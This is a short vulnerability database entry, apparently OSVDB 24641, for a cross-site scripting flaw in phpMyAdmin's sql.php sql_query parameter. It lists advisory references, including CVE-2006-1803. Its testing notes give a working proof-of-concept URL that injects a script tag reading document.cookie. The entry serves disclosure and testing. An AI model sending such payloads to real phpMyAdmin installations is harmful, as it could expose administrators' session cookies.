phpMyAdmin sql.php sql_query Variable XSS

2006-04-12T06:02:39
ID OSVDB:24641
Type osvdb
Reporter OSVDB
Modified 2006-04-12T06:02:39

Description

Manual Testing Notes

/phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=fu&table=fu&goto=tbl_properties_structure.php&back=tbl_properties_structure.php&sql_query=[XSS]

/phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=fu&table=fu&goto=tbl_properties_structure.php&back=tbl_properties_structure.php&sql_query=SELECT+*+FROM+%60'%3Cscript%3Ealert(document.cookie)%3C/script%3E'%60

References:

Vendor URL: http://www.phpmyadmin.net/
Vendor Specific Advisory URL
Secunia Advisory ID: 19897
Secunia Advisory ID: 19659
Related OSVDB ID: 24642
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0259.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0279.html
FrSIRT Advisory: ADV-2006-1372
CVE-2006-1803
Bugtraq ID: 17487